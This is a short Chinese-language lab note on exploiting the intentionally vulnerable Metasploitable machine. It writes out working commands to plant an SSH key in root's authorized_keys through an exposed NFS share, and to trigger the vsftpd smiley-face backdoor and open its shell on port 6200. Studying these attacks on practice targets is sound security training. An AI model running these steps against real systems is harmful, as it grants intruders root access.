Metasploitable 漏洞学习 一
TCP端口
512,523,514端口是都知道的“R”服务 可以通过
rlogin -l root IP
进行测试
使用root身份进行远程登录 如果提示输入ssh秘钥 则证明没有安装rsh-client工具
解决办法:
rpcinfo -p IP
可以测试服务器存在网络文件系统(NFS),然后根据测试判断存在可共享/导出的文件,然后再攻击系统上生成新的SSH秘钥 安装NFS导出 然后添加到文件夹中
具体操作:
mkdir /tmp/r00t
mount -t nfs IP:/ /tmp/r00t
cat ~/.ssh/id_rsa.pub >> /tmp/r00t/root/.ssh/authorized_keys
umount /tmp/r00t
ssh root@IP
#mount 挂载的意思
Vsftpd源代码包含漏洞
端口21 是ftp服务器 在vsftpd上有一个特定的后门 如果在输入用户名后以:)笑脸为结尾,后门会在6200端口开始监听shelll
方法一:
具体操作:
telnet IP
user backdoored:)
^]
quit
telnet IP 6200
※ 在实验之前需要需要安装东西
apt-get install telnetd
apt-get install xinetd
vim /etc/inetd.conf
...
#daytime stream tcp6 nowait root internal
#time stream tcp6 nowait root internal
#